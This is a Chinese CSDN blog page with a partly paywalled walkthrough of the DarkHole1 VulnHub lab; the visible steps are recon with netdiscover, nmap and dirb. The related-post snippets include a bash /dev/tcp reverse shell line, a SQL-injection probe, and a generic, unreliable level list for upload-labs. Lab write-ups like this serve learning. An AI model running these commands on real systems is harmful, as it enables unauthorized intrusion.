靶场-DarkHole1

已于 2023-06-16 13:07:07 修改
阅读量346 收藏
点赞数
分类专栏: 靶机 文章标签: 网络 java 安全
于 2023-06-16 10:47:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58602402/article/details/131239553
版权
本文介绍了在DarkHole1靶场中的渗透测试过程,包括环境搭建、信息收集、漏洞挖掘及利用、提权等步骤。通过端口扫描和目录扫描发现了开放的22和80端口以及一个登录页面,尝试SQL注入未果,但通过注册账户和文件上传漏洞,最终利用PHP后缀的phar文件实现远程连接。在提权阶段,通过查找suid权限程序并利用命令劫持技巧成功提升权限。
摘要由CSDN通过智能技术生成

DarkHole1

环境搭建

靶机下载地址:
https://vulnhub.com/entry/darkhole-1,724/
kali攻击机ip:192.168.12.144
靶机ip:192.168.12.169

一、信息收集

1.主机发现,发现目标靶机192.168.12.169

netdiscover -r 192.168.12.1/24

在这里插入图片描述
2.对靶机进行端口扫描,发现开放22端口和80端口

nmap -sS -sV -T4 192.168.12.169

在这里插入图片描述
3.访问80端口,发现登录页面和一个登录入口
在这里插入图片描述

二、漏洞挖掘

1.对目录进行扫描

dirb http://192.168.12.169/

最低0.47元/天 解锁文章
二和不会
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
VulnHub DarkHole靶机
qq_39428734的博客
04-13 523
扫描局域网内存活主机 得到靶机IP 使用namp扫描存活靶机开放了哪些端口 得到靶机开放了22,80端口 进入80端口的网页服务 查看网页源代码没有发现任何东西 爆破目录,查看有那些敏感目录 看到了一个配置文件和后台管理界面,登录界面等等 在config目录里面查看到了database.php文件 我们把它下载下来 啥也没有。。 后台管理界面显示没有权限 登录界面中看到了 正式的登录界面 我们去注册界面看看 注册一个用户并登录试试
darkhole1靶场渗透通关
tpaer的博客
10-02 974
记录下靶场实战的通关过程。主要通关流程是利用web页面的逻辑漏洞进行越权,再绕过文件上传黑名单上传木马getshell,最后通过本地环境变量进行提权。只是一种思路,也可以用一些其他通杀漏洞(CVE-2021-4034)来打。
DarkHole1 vulnhub靶场
weixin_62621015的博客
03-14 185
DarkHole1 vulnhub靶场个人通关笔记
Dark_hole2靶机实战——详细版
qq_74243714的博客
07-02 552
Sorry, user jehad may not run sudo on darkhole.(不可 sudo提权)--------------计划任务提权-------------sudo -l (发现不能够使用sudo,因为没有losy密码)发现修改历史中有账号和密码,以及dashboard.php页面。方法二:josy用户退回到根目录查看所有文件(包括隐藏文件)SSH登录losy用户(sudo提权)发现账号管理页面,可以修改账号信息。方法一:想到爆破密码(一般不建议)获取到SSH用户密码!
【Vulnhub靶场】Vulnhub靶场实战解析之DarkHole-1
KKleeeaa的博客
05-20 594
然后我们在通过之前的页面,就可以试试越权修改账户密码。我们知道了靶机的IP为192.168.5.159然后开放22(SSH),80(http),我们可以访问一下网页。第一步我们首先nmap扫描网段查看端口开放情况,因为我们不知道靶机的IP地址是多少。进去之后发现是这个个人信息页面,我们看到上面的URL链接ID=2我们把他改为1试试。可以看到成功的进入到admin的页面,然后这里有个上传文件的地方,直接上传马。然后我们看到下面有个可以注册的地方,我们可以注册一个账号。先开启抓包,然后再抓取修改密码的包。
Vulnhub: DarkHole:1靶机
qq_43884092的博客
06-28 145
越权修改admin用户密码,上传phtml后缀的webshell,环境变量和sudo提权
信安必备靶场-sqli-labs-master-用于练习sql注入各种注入类型
最新发布
08-12
sqli-labs-master是一个SQL注入(SQL Injection,简称Sqli)实战靶场的资源。这个靶场通常用于安全培训、渗透测试和学习Web应用程序安全方面的人员,它提供了一系列的模拟环境和挑战,目的是让用户通过实际操作来...
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。...
Neos的渗透测试靶机练习——DarkHole-2
qq_38678845的博客
01-22 1102
一次渗透测试靶机练习
Vulnhub靶机:DARKHOLE_ 2
LainWith的博客
09-14 1312
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2。
DarkHole靶机渗透
W_an_feng_的博客
06-10 290
DarkHole靶机渗透
安全】vulnub靶机DARKHOLE: 1
qq_43017750的博客
01-20 4188
DARKHOLE: 1 About Release Back to the Top Name: DarkHole: 1 Date release: 18 Jul 2021 Author: Jehad Alqurashi Series: DarkHole Download Back to the Top Please remember that VulnHub is a free community resource so we are unable to check the machines that a
vulnhub靶机-DarkHole: 1
臭nana的博客
08-25 1021
靶机描述: Difficulty: Easy It's a box for beginners, but not easy, Good Luck Hint: Don't waste your time For Brute-Force 1、找到靶机ip:192.168.162.132 nmap -sn 192.168.162.0/24 2、扫描靶机端口,发现开放22和80端口 ┌──(root????kali)-[~] └─# nmap -A -p- 192.168.116.132
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 4255
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
靶机渗透练习44-DarkHole-1
hirak0的博客
04-19 916
靶机描述 靶机地址:https://www.vulnhub.com/entry/darkhole-1,724/ Description Difficulty: Easy It’s a box for beginners, but not easy, Good Luck Hint: Don’t waste your time For Brute-Fo 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.142 注:靶机与Kali的
vulnhub靶机darkhole
weixin_52450702的博客
11-28 692
vulnhub靶机darkhole
upload-labs靶场1-21通关
08-17
你好!要通关 upload-labs 靶场的第 1-21 关,你需要依次完成每个关卡的任务。以下是通关每个关卡的一些提示: 1. Level 1 - 文件上传漏洞:尝试上传一个恶意文件,看看能否绕过上传限制。 2. Level 2 - 文件包含漏洞:尝试利用文件包含漏洞,读取服务器上的敏感文件。 3. Level 3 - XXE漏洞:在上传的 XML 文件中尝试触发外部实体注入。 4. Level 4 - SQL注入漏洞:利用输入点进行 SQL 注入攻击,尝试获取数据库中的敏感信息。 5. Level 5 - SSRF漏洞:尝试利用服务器端请求伪造漏洞,发起内部网络请求。 6. Level 6 - 文件上传漏洞2:绕过上传限制,上传一个恶意文件。 7. Level 7 - 文件包含漏洞2:利用文件包含漏洞,读取服务器上的敏感文件。 8. Level 8 - 反序列化漏洞:尝试触发反序列化漏洞,执行恶意代码。 9. Level 9 - 文件上传漏洞3:绕过上传限制,上传一个恶意文件。 10. Level 10 - 文件包含漏洞3:利用文件包含漏洞,读取服务器上的敏感文件。 11. Level 11 - XXE漏洞2:在上传的 XML 文件中触发外部实体注入。 12. Level 12 - SSRF漏洞2:尝试利用服务器端请求伪造漏洞,发起内部网络请求。 13. Level 13 - 文件上传漏洞4:绕过上传限制,上传一个恶意文件。 14. Level 14 - 文件包含漏洞4:利用文件包含漏洞,读取服务器上的敏感文件。 15. Level 15 - SQL注入漏洞2:利用输入点进行 SQL 注入攻击,尝试获取数据库中的敏感信息。 16. Level 16 - 文件上传漏洞5:绕过上传限制,上传一个恶意文件。 17. Level 17 - 文件包含漏洞5:利用文件包含漏洞,读取服务器上的敏感文件。 18. Level 18 - 反序列化漏洞2:尝试触发反序列化漏洞,执行恶意代码。 19. Level 19 - 文件上传漏洞6:绕过上传限制,上传一个恶意文件。 20. Level 20 - 文件包含漏洞6:利用文件包含漏洞,读取服务器上的敏感文件。 21. Level 21 - XXE漏洞3:在上传的 XML 文件中触发外部实体注入。 请注意,在完成每个关卡时,要仔细阅读相关提示和代码,理解漏洞的原理,并尝试不同的方法来解决问题。祝你顺利通关!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值